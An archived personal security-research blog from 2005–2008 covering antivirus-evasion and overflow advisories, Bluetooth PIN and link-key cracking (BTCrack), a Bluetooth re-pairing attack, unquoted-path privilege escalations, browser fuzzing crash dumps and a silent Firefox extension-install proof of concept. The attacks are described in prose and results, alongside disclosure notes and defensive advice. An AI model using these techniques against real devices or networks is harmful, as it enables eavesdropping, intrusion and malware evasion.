Thierry Zoller

Humankind cannot stand very much reality.

New Blog location

firewall I moved toward a new blogging system, makes it easier to maintain, expect more frequent updates: new blog url is blog.zoller.lu

This page will serve as a location to publish research results or advisories. The blog will serve as a way to publish small tidbits or links.

 

08 / 2008 Posted by Thierry | Tags:Hacking Cars| Comments?

The Death of AV Defense in Depth? Revisiting AV Software

firewall It has been quite some time since I updated this blog, I will try to update the blog in the next weeks, with a few details what I was up to during the last months.

Let's start with the more important stuff, I got into AV Research again =) The output of which will hit the public in the next months, be warned there will be a flood of advisories :D


Together with Sergio Alvarez I gave a talk @ Hack.lu 2007. This year we explained what the heck is up with Anti-Virus software. We revisited the way AV solutions are implemented in current Company networks, and AV Engines themselves. Defense in Depth is being misinterpreted and incorrectly implemented with disatrous effects. (They believe they do DiD when in reality they do not, this is an important fact to keep in mind.)

Rough Break-down of the Talk :

  • DiD as implemented for Anti Virus Software is broken, companies put one AV engine after the other believing it to be DiD. The worst security incident in such an architecture is being incorrectly defined as "A virus passes the gateway unrecognized" , in reality the worst possible failure is that the underlying Operation System is compromised through the AV Engine, you have to mitigate this.
  • AV Software is broken behond recognition, they parse enormous amounts of Data in unmanaged programming languanges and such are naturaly prone to errors. This was clear from the start, but the shear amount of bugs is someting else.The reality shows they all are.
  • AV Software runs directly on critical (with high privileged rights) infrastructure, AV Software runs everywhere
  • E-mail changes what is at stake: What happens if I sent an exploit targeting AV software as an attachment in an E-mail ? (You can automatically compromise Corporate Mail Servers/Clients/Gateways, from the outside as your email travels through your firewalls untouched

You can view the presentation here, might be interesting to you, I don't think everybody is aware of the impact some findings may have: http://www.nruns.com/ps/The_Death_of_AV_Defense_in_Depth-Revisiting_Anti-Virus_Software.pdf

Note: n.runs tried to find a generic solution against these problems and has found a way to protect against known and unknown attacks.

 

11 / 2007 Posted by Thierry | Tags:Hacking Cars| Comments?

Planetopia TV Show - Posterboy...

firewall This is kind of old news and present it here for the archives, a German TV Channel "SAT 1" did a documentary with me on Bluetooth security. I am not happy about the outcome, they had around 5 hours of footage, 5 minutes were used, and only the lame stuff shown. The real stuff (MiTM,cracking etc) has not even been indirectly refered to.

 

 

 


Sight, anyways here it is :

For those that understand German here is the archived footage :



11 / 2007 Posted by Thierry | Tags:Hacking Cars| Comments?

BTSniff - Bluetooth sniffing under *nix

btcrackMy call for an OSS Bluetooth sniffer during the last 23C3 in Berlin has not been unanswered, first there was Max Moser ("Bluetooth - Getting raw access") that uncovered how you can modify a consumer USB stick by flashing it with a commercial BTSniffer firmware (there was at least one vendor that included the firmware with every trial download) and get RAW access to it.

The question that was left was how to send commands to it, get it into sniffing mode, synching it to the other devices. Exactly this is what Andrea Bittau and Dominic Spill found out during his work on a Paper entitles "BlueSniff: Eve meets Alice and Bluetooth", he further implemented it in C code. The paper will be shortly be published and presented at this years' USENIX.

In other words a Bluetooth Hacker dream has partially come true, a cheap and (partialy) open way to sniff and capture packets, including the Pariring-handshake which may than be cracked.

Andrea is currently working on cracking open the very last thing that holds him from crafting low level Bluetooth packets, the XAP2 processor, he dissassembled the firmware to find out how exactly it works, for that he wrote his own dissassembler. After this he/we may write our own firmware and basicaly do whatever we like, for example a full blown fuzzer or full blown attack device.

Other very interesting findings will be uncovered, more on this later :)

sniffer.c
Makefile
Sync.sh

 

Mai 2007 Posted by Thierry | Tags:Hacking Cars| Comments?

Politics - WTF are you thinking ? My Wake-Up call

btcrack

I rarely comment on political issues within this blog, now I do. Overall in Europe politians seem to be jumping the bandwagon as to loosing privacy rights and surveillance laws.

The scapegoat here is "Islamic Terror", especially in Germany it is being blamed for pretty much everything. I call Bullshit.

 

 

Check the inpendendant report of "EU TERRORISM SITUATION AND TREND REPORT 2007" by nobody else than Europol.

I repeat: "Islamic Terror is the number one threat to Europe" is the chanson of lots of politicians, now check this :

My question is this, how comes a politician can make such claims without being held accountable, when there is clear evidence that he is simply pushing an agenda and doesn't care about reality ? Not too mention these other "Terrorist" groups always existed, always were there. One thing is clear to me, if we don't get off our lame asses and start to do something we soon will be no better than the US.

 

Mai 2007 Posted by Thierry | Tags:Hacking Cars| Comments?

BTCrack 1.1 - FPGA Release :)

btcrack

BTCrack 1.1 is ready! I named it BTCrack Heisec release, because I released it during the Security Conference of Heisec

BTcrack is a pairing handshake cracker against Bluetooth 1.0 - 2.0 for more information please resort to the Paper by Shaked and Wool and the website listed at the end of this E-mail.

 


In cooperation with PicoComputing (http://www.picocomputing.com/) we added FPGA support to BTCrack 1.1 and increased the Software speed by 15% reaching 200.00 keys per second on a stock P4-Dual Core 2.0ghz

Version 1.1 :
  [+] Added Priority Control
  [*] Fixed splash bug
  [+] Added FPGA Support
  [+] Speed increase (15%)

Speed CPU
     200.000 keys/sec DualCore P4 2 GHZ
  7.600.000 keys/sec E12 @ 50mhz (Pico FPGA)
10.000.000 keys/sec E12 @ 75mhz (Pico FPGA)
30.000.000 keys/sec E16 (Pico FPGA)

 

Download BTCrack 1.1

 

Mai 2007 Posted by Thierry | Tags:Hacking Cars| Comments?

Secure Web Applications - Alexios Fakos

sichere web applikationen

A friend and colleague of mine, namely Alexios Fakos has published a Book under the title of Sichere Web Anwendungen, unfortunately it is german only. If you'd like to know how to code hardened Applications I heartly recommend this Book.

A free Chapter of the Book can be found here

 

 

 

 

 

 

Mai, 2007 Posted by Thierry | Tags:Sichere Webapplikationen| Comments?

23C3 - Bluetooth Hacking revisited

firewall

Kevin Finistere and myself gave a Bluetooth Presentation at the 23C3 congress in Berlin on the 29.12 at 14:00 local time. We released a bit of 0day and a bit of protocol bugs and tidbits. See for yourself :) Thanks to everybody that made this possible also thanks to the CCC for organising this event, while I couldn't really participate as a spectator at least I can judge about the behind the scene work. I was impressed. The organisation was good and poeple very friendly and helpfull.

 

Releases during 23C3 :

Please for those writing about this lecture, they key findings are not the tools. You have been so spoon fed by the last Bluetooth talks that you think what is important are tools :(

There now are underlying protocol security issues not only pure implementation issues :

What is important to understand is that non-discoverable mode no longer represents a protection. Naturaly before attacking a devicey ou have to know it's there, previosuly you could try to bruteforce the address (bd_addr) in order to find it, if it was in non-discoverable state. This however is a unreliable and takes a very long time.

During this talk i released information on how to PASSIVELY discover 90% of the address and bruteforce the 8-bit remaining. Which is reliable and fast.

THIS means the the only protection Bluetooth has to protect you from connecting to my device is GONE.

Also the paradigm shift from toys to workstations is als considerable:

  • We can eavedrop on your Laptops Microphone, we can compromise it and take control over it.
  • The random number generators and the encryption affected by them is weak.
  • New Re-pairing attack, making the pairing attack INTERESTING.
  • Your drivers lack control, no update function and are flawed beyhond comprehension
  • Live demo on how to take over a PC and get a remote shell over Bluetooth

Key points from the Lecture :

  • Pin and Link key recovery is practicaly possible (code release and live demo)
  • If you use Bluetooth beyboards or mice, your PC has a HID server, these may be attached to inject commands (!) as if you were typing on the keyboard
  • The random numbers used for encryption and so forth may be very weak for your device
  • The Pin is not that usefull the Link key is !
  • Swap over to Bluetooth 2.1 (as soon as possible) and use "Secure Simply Pairing"
  • Regard the quality of the encryption Bluetooth offers (E0) as a PRIVACY feature NOT a security feature. (Compare it to WEP)
  • New re-pairing attack : Connect to the master pretending to be from the piconet, use a fake linkkey, master will think (oops lost the pairing) and will re-initiate the pairing given an attacker the choice to capture the exchange and crack it.
  • Don't trust encryption taking place, sometimes the devices negotiate Security Mode 2, and you don't know your data is actually transferred in clear text (after being authenticated) and you can't actually check as you don't have a Bluetooth Sniffer.
  • The Bluetooth PIN is actually a Bluetooth Passkey, it supports characters not only digits (this has security implications)
Things to do once you have the link key:
  • Passively decrypt the traffic
  • Connect to the slaves pretending to be the master and have full access (no pin required)
  • Connect to the master pretending to be one of the slaves have full access (no pin required)
  • Plant the link key on a BT capable machine and have a remote encrypted stealth channel to that machine

Update your Drivers !
  • Widcomm, Toshiba, Bluesoil, ALL vulnerable
  • Don't rely on Windows update for that, your BT stack may be from a third party vendor (very likely)
  • Listening on the Microphone and recording is also possible on PCs (not only cars)

General Recommendations :

  • Delete your existing pairings as soon as you don't need them
  • Pair in "secure places" SIG recommendation
  • As soon as your device asks for a PIN again, don't enter it you might be snooped on (see previously mentioned pairing attack)
  • Don't trust Bluetooth 1.0 - 1.2 (can't tell for 2.0-2.1 yet)

Companies :

  • Mitigate and Monitor.

Companies using Bluetooth for Industrial purposes :

  • Regenerate a new key every 5 minutes, use 16 chars.

Vendors :

  • PLEASE implement the GUI to use the possibility for bluetooth to use characters (UTF8) NOT ONLY DIGITS.
  • Please be more transparent towards your device driver version numbers and propose an easy way to update.

January 1, 2007 Posted by Thierry | Tags:Bluetooth| Comments?

BTCrack 0.9a - Pre-Final Release

firewall

BTCrack 0.9a is going ahead nice, optimisations have been done and the final release will be on the Nruns website as promised very soon™ :)

BTCrack 0.9a now spawns 8 threads in order to crack the keys, and this implies that dual-core or quad-core processors are working out very nicely :) A few assembler optimisations are still ahead and the final release should be ready for 23c3.

The general assumption that the attack is theroreticaly possible and that Pins of 6 digits represent a good protection is now pratcticaly refuted.

 

 

Here are my current stats on a Dual-Core P4 2Ghz (48000 pins per second)

Pin Time required (seconds)
1234 0,25
12345 1,59
654321 16,171
123456789 4851,156 (1,3 hours)

 

New Video - Cracking a 6 digit Pin

 

December 15, 2006 Posted by Thierry | Tags:Hacking Cars| Comments?

Hack.lu - 0-day stuff , nice Conference

firewall

Hack.lu is over! a nice security conference in Luxembourg. Had a great time, although sometimes organisation was a bit messed ;) Reeaaaallly nice and very interesting poeple, commercial rate was very low and finaly I saw some poeple I knew only virtually in real life.

Well as you knew or not knew, Kevin Finistere and myself gave a talk about Bluetooth security. Yaaaaaaaaaaawwwwwwwwwwnnnnnn ?


I don't believe so :

- Live demo : Remote ROOT shell over Bluetooth on MAC OS 10.3.9 / 10.4 (and source code release)
- Live demo : Presenting BTCrack, Bluetooth PIN and Linkkey cracker
                   Will be released on Nruns.com complete with source code in a few weeks!
- Clearing the Air about Inqtana (The PoC Worm Kevin created)
- FUD reduced to a minimum. What's a threat, what isn't.
- Download our Slides from Hack.lu

See you next year !

 

August 3, 2006 Posted by Thierry | Tags:Hacking Cars| Comments?

The forgotten Security Tool - Satori

firewall

I started using this tool last year ago during internal tests, it was immediately obvious to me that this is a great tool to have. It's name is Satori, if you never heard about it that's not a proof the tool is no good but rather that it's Author Eric Collman does not really seem to care if you do (or at least doesn't scream it from the top of every house)

I found out about Satori while reading the paper "Chatter on the Wire" (from the same author) which goes into great length about passive OS fingerprinting and it's potential for improvement as done by several other tools. What is interesting is that the paper was not only theoretical but rather practical, it's outcome was Satori, a beautiful plug-in based Passive enumeration and Fingerprinting tool.

Satori uses Winpcap and captures packets passively at the NDIS level, every packet flying by is being scrutinised for information that might determine it's OS. Nothing new here you might say, well Satori does the fingerprinting on :
DHCP, BOOTP, ICMP, TCP, CDP, EIGRP, HPSP , HSRP, HTTP, ICMP, IPX, SMB, SNMP, STP, UPNP precisely enough to either correlate the results with nmap or to rely on them. It makes spotting potential vulnerable systems a breeze.

It's obviously very handy for critical networks where you are not allowed to scan or to scan only a minimum. (This does exists.)

 

 

It shows it's strength when used in internal networks, I was able to spot machines that didn't belong in a certain critical network immediately (as they broadcasted their Netbios presence) by only using passive means. It's also very usefull when doing quick scans (nmap port 80 as example) across an internal network, it gathers all packets, makes a list of all responding machines, fingerprints them and gives you an exportable list. Very handy.. and speedy, I was able to pump 8000 packets per second thorough without any lags or problems.

Nice tool to have in your toolbox. Send it's author your support :)

August 3, 2006 Posted by Thierry | Tags:Hacking Cars| Comments?

XAMPP - Multiple Privilege Escalation and Rogue Autostart

firewall

Introduction :
XAMPP is an easy to install Apache distribution containing MySQL, PHP and Perl. XAMPP is really very easy to install and to use - just download, extract and start.
In the FAQ we read : Xampp is not meant for production use but only for developers in a development environment. However I have seen it being used in production environments quite a lot, hence this advisory. According to the download stats, Xampp has been downloaded 2.765.443 times between 2003 and 2006

Title : Xampp - Multiple Priviledge Escalation and Rogue Autostart
Ref  : TZO-062006-Xamp

[1] Priviledge Escaltation to SYSTEM due to FileZilla Service Path specification - CVSS Rating : 4
[2] Priviledge Escaltation to SYSTEM due to MySQLadmin Path specification - CVSS Rating : 4
[3] Priviledge Escaltation to SYSTEM due to CGI Path specification - CVSS Rating : 4
[4] Rogue Autostart due to unsecure File execution - CVSS Rating : 2.8

 

Read more

May 21, 2006 Posted by Thierry | Tags:Research and Development| Comments?

Bluetooh + GPS + 360° Camera = Bluetooth Wardriving machine

bluetooth sniperKevin Finstere has done some great things lately, he combined a Bluetooth setup (14 db yagi) with a GPS mouse and a 360° cam to form a Bluetooth Wardriving set.

Whenever it spots a Bluetooth device it makes a 360° snapshot and writes the Date, Position and BT Address into the image file.

Image1 - Image2 - Image3

 

 

 


April 6, 2006 Posted by Thierry | Tags:Research and Development| Comments?

CSS-Die! - A few interesting Results

firewall
HD Moore released a new fuzzer to the public, it's called CSS-DIE and as it names implies it fuzzes most Browsers to death using only CSS tags. I helped a bit on that project and HD credited my for that (Thanks!)
. Thanks to Eric Sesterhen for helping me out on the asm part.

 

 

 

Here are a few interesting results I obtained :

Internet Explorer 6 (latest version, all patches applied)

blink.style.mozboxorient 16385

EAX 00740068
ECX B99600B5
EDX B99600B6
EBX 00140000
ESP 0012CE50
EBP 00140A18
ESI 00140A18
EDI 00000013
EIP 7C912F17 ntdll.7C912F17

MOV EBX,DWORD PTR DS:[EAX]


Opera (latest version) :

Lots of Null Pointers (Denial of Service)

margintop

EAX 00000000
ECX FFFFFFFF
EDX 00000000
EBX 00000000
ESP 0012F374
EBP 0012F3A4
ESI 00C01CF0
EDI 00C01CF0
EIP 67B3DF80 Opera_1.67B3DF80

67B3DF80 8B43 04 MOV EAX,DWORD PTR DS:[EBX+4]

marginright

EAX 00000000
ECX FFFFFFFF
EDX 00000000
EBX 00000000
ESP 0012F374
EBP 0012F3A4
ESI 00FFB638
EDI 00FFB638

EIP 67B3DF80 Opera_1.67B3DF80


67B3DF80 8B43 04 MOV EAX,DWORD PTR DS:[EBX+4]

marginleft

EAX 00000000
ECX FFFFFFFF
EDX 00000000
EBX 00000000
ESP 0012F374
EBP 0012F3A4
ESI 00E94ED8
EDI 00E94ED8
EIP 67B3DF80 Opera_1.67B3DF80


67B3DF80 8B43 04 MOV EAX,DWORD PTR DS:[EBX+4]


April, 15 2006 Posted by Thierry | Tags:Funny| Comments?

Trusted Computing - Who do YOU trust ?

firewall
Here is an interesting Video about Trusted Computing I came across. Makes a point without falling for FUD.


 

 

 



March 9, 2006 Posted by Thierry | Tags:Funny| Comments?

Windows Kernel - ASAP

firewall
Here is a Job offer I came across on Monster
, they don't seem to know what exactly they are searching, who cares ? send your CV ASAP.


 

 



March 9, 2006 Posted by Thierry | Tags:Funny| Comments?

Silent Firefox Adware Install - Proof of concept

firewall
Introduction :
Firefox has long been considered Spyware hardened and spyware safe, it never really was. Don't get me wrong on this, it's not the fault of Firefox (although it could be a bit better protected against this particular attack). I made a small movie demonstrating this particular Proof of Concept.

Update: A bit of clarification what this fuzz is all about, as you see in the small animation, the Extension installs without any user interaction. That should be quite new, Firefox tries to block silent installs though random profile directory names and various other tricks. The adbar sends any URL you visit to a google syndication server thus monitoring your surf behaviour.

Update : The animation takes some time to load, wait for it.

Details :

Click on the image above.

March 9, 2006 Posted by Thierry | Tags:Research and Development| Comments?

Safe'nsec HIPS & Anti-Spyware- Priviledge Escalation

firewall
Introduction :
"Safe'n'Sec is complex data and user applications protection against threats and vulnerabilities for individual PC as well as workstations in corporate networks. The program uses proactive technology based on activity analysis in user PC. "



Details :
Multiple Insecure File execution and Autostart handling

During Startup, snsmcon.exe spawns the GUI process named safensec.exe through the use of CreateProcess() . By doing so it omits to set the variable'lpApplicationName' and further omits to quote the path in the variable "lpCommandLine"....

During Autostartup, Safe'nSec omits the quotes around the path to the executable and as such may spawn a rogue application instead of the appropriate Starforce application.

The vendor (Starforce) did not care to respond to my report. Thus I decided to publish this low-impact vulnerability.
Update: Starforce quickly fixed the issues after the diclosure. (see Read more)

Read more

February 19, 2006 Posted by Thierry | Tags:Research and Development| Comments?

F-Secure AV - Anti-virus Bypass and Buffer Overflow - Update

firewall
Introduction :
Flaws in the way F-Secure software handles ZIP and RAR data compression archives could allow an attacker to execute remote code on users' systems and also to bypass F-Secure's antivirus-scanning capabilities.

 

Details :
I found mutliple vulnerabilities within various AV Engines, F-Secure are the first to actually publish a real advisory, others fixed the bugs silently or put a small notice in a change_log. I will however not publish more details about the findings as of yet, there are too many AV engines vulnerable to similar issues and I am going to wait until most of them have patched the flaws until I exactly dislclose my findings.
http://www.f-secure.com/security/fsc-2006-1.shtml

Rain Forest Puppy once defined a "Responsible Disclosure Practice", I adhere to it.

[Update]
The Story has been posted on SecurityFocus, News.com, Washington Post, Heise, Suedeutsche, ZDnet, Computerworld, and various others. Special Thanks to Mikko for giving me Credit.

 

January 19, 2006 Posted by Thierry | Tags:Research and Development| Comments?

CheckPoint VPN-1 SecureClient - CheckQuotes

Checkpoint
Introduction :
As employees become more mobile, sophisticated VPN solutions are required to meet key security challenges such as securing access to corporate resources and protecting remote desktops. To meet the VPN client needs of any organization, Check Point offers VPN-1 SecureClient.

Details :
During Startup, the SR_Watchdog spawns the GUI process named SR_GUI.exe through the use of CreateProcess() . By doing so it omits to set the variable'lpApplicationName' and further omits to quote the path in the variable "lpCommandLine"....

I decided this being not worth reporting to the vendor, this is low impact, although it shows quite a bad coding practice.

Read more

 

January 16, 2005 Posted by Thierry | Tags:Research and Development| Comments?

When you trust WehnTrust - Priviledge Escalation

Wehntrust
Introduction : WehnTrust is a Host-based Intrusion Prevention System (HIPS) that provides secure buffer overflow exploitation countermeasures. While other Windows based intrusion prevention systems are only capable of working with a pre-defined group of applications, WehnTrust's technology allows it to work with virtually all software products. Perhaps best of all, WehnTrust is currently free for home use.

Details :
Wehntrust forgets to correctly quote the autostart key and thus may start c:\program.bat|exe|com on reboot...

Read More

January 16, 2005 Posted by Thierry | Tags:Research and Development| Comments?

WMF Vulnerability PATCH -

Windows XP sp2
Here is a patch against the WMF vulnerability from IDA PRO coder
Ilfak Guilfanov :
http://handlers.sans.org/tliston/wmffix_hexblog14.exe

Apply it now and uninstall when MS provides a patch.

Updated the link, thanks Tomas Vanhoof.

January 03, 2005 Posted by Thierry | Tags:Research and Development| Comments?

New AV-Evasion Methods - Summary

firewall
My current research result :

New Methods of Evasion 5
AV Products currently affected : 22* (counting)
Gateway Solutions affected : 2 * (counting)

Only taking into account vendor confirmed vulnerabilities.

 

I won't disclose what products are affected by which "vulnerability" until the vendor has patched the software and given me clearance to go ahead.

It's amazing how differently AV vendors react to such reports, some like Fortinet respond very quickly disclose all the versions vulnerable and have a patch ready in merely days, others give you a single point of contact, act very professional, give you weekly updates, yet others say they have no time, or consider your research "doubtful" or question the "methology" (without fixing the actual bugs).

I will include these reactions as comments and as neutral as human possible in my future advisories.

* The number depends on cooperation of the vendor to disclose all vulnerable versions.

December 28, 2005 Posted by Thierry | Tags:Research and Development| Comments?

ICMP Types - Ban them all!

firewall No, please don't. I have seen tons of recommendations to filter all ICMP traffic, I have seen poeple feeling all warm and fuzzy inside because they blocked all those nasty ICMP Datagrams, some having severe network congestion problems _because_ they filter every ICMP packet.

Well here is news for you: ICMP is there to help you.

 


Types to consider not to Filter :
- ICMP Type 3 Code 4 : Fragmentation needed, but DF bit is set (Outgoing) Why ? Path MTU discovery
- ICMP Type 11 : Time exeeded (Incoming) Why? Traceroute, also important when routing loops occur. Block outgoing (Firewalking)

Block all the other ones, if you like to ping allow 8 0 out and 0 0 in.

Cisco IOS Template | Raven Alder

December 28, 2005 Posted by Thierry | Tags:Information| Comments?

F-Prot/Frisk Anti Virus bypass - ZIP Version Header

ZIP evasion anti virus TZO-012005-Fprot - Yet another AV bypass
The F-prot engines failes to decompress ZIP files which have a version header greater then 15. The consequence is that the F-prot Engine is unable to scan the virus/malware inside and consequently flags it as harmless. If used as an Email Gateway solution the offending Emails will slip through.

Read more

November 3, 2005 Posted by Thierry | Tags:Research and Development| Comments?

Reproducible Stack Overflow in IE

stack overflowI found what looks like a reproducible Stack Overflow in IE 6.0.2900.2180 (all patches applied), I am currently investigating if it is exploitable or not.
-> vulndev@securityfocus.com



October 29, 2005 Posted by Thierry | Tags:Research and Development| Comments?

My Bluetooth Weapon

bluetooth sniperThis is my version of the the Bluetooth Sniper weapon, it features a medium sized YAGI antenna combined with a 10* magnification scope and a metalised parabole which bundles the Bluetooth signal further enhancing the range.

The interior is made from a Linksys USB dongle soldered to the yagi and to a USB connector. Read more

October 18, 2005 Posted by Thierry | Tags:Research and Development| Comments?

RAR - Evasion of Anti Virus Detection

RAR evasion anti virusThis bug is similar to the bug reported by Dr. Peter Bieringer, most vendors have since fixed the bug in their ZIP unpacking functions, however a similar Bug exists in the RAR unpacking code and probably also in other Archive unpacking functions.

Anti Virus scanners fail to correctly scan the files due to escape sequences within the filename and give them a clean bill, for a scanner used on an AV mail gateway this means the file is passed on without any warning.

Companies relying on Anti Virus scanners on the email gateways as their sole protection. These can be easily bypassed using these techniques. Read more  (Errors found, needs to be redone)

October 17, 2005 Posted by Thierry | Tags:Research and Development| Comments?

Microsoft monitors Search queries - Windows XP SP2

Windows XP sp2My R&D section opens with this entry : "...It is possible for Microsoft™ to monitor and data mine search terms even when those are searched over Google or other Search engines. This is possible because Windows XP SP2 first submits the serach terms to the MSN server and then redirects to the requested search engine.." Read more More to come soon...

October 15, 2005 Posted by Thierry | Tags:Research and Development| Comments?

OSVDP member

I have been accepted as a member of the OBSVDP Project, and here is the first bug I mangled :

Kerio Personal/Server Firewall Driver Memory Locking Local DoS

OSVDB is an independent and open source database created by and for the security community. The goal of the project is to provide accurate, detailed, current, and unbiased technical information on security vulnerabilities. I encourage you to join the effort and to contribute to the Project.

October 14, 2005 Posted by Thierry | Tags: hax0red | Comments?

Pictures from Defcon 13

Defcon 13 I posted a few pictures from my Defcon 13 visit. Las Vegas and Defcon 13 was great, however I have been disappointed by the level of some if not most presentations, some of them were perverted into some sort of one-man-show not really disclosing the essence of the talks but turning into drinking games, which may be entertaining to watch sometimes but not if you traveled over 14 hours in a plane just to be there. Greetings Efugas by the way. Defcon 13 Gallery

 

October 14, 2005 Posted by Thierry | Tags: hax0red | Comments?

My Visa had been hax0red

Visa crackedApparently my card number was part of the "30 million visa card hack", however unlike many other VISA offices, the repsonsible center in Luxembourg (CETREL) immediately blocked the cards, notified the users and immediately issued new cards. Lack of scanning device I took a picture of the letter in French and "English".

 

October 14, 2005 Posted by Thierry | Tags: hax0red | Comments?

First Post !

 

First post on my egocentric place in Cyberspace. It's all about me.

 

October 13, 2005 Posted by Thierry | Tags: Information | Comments?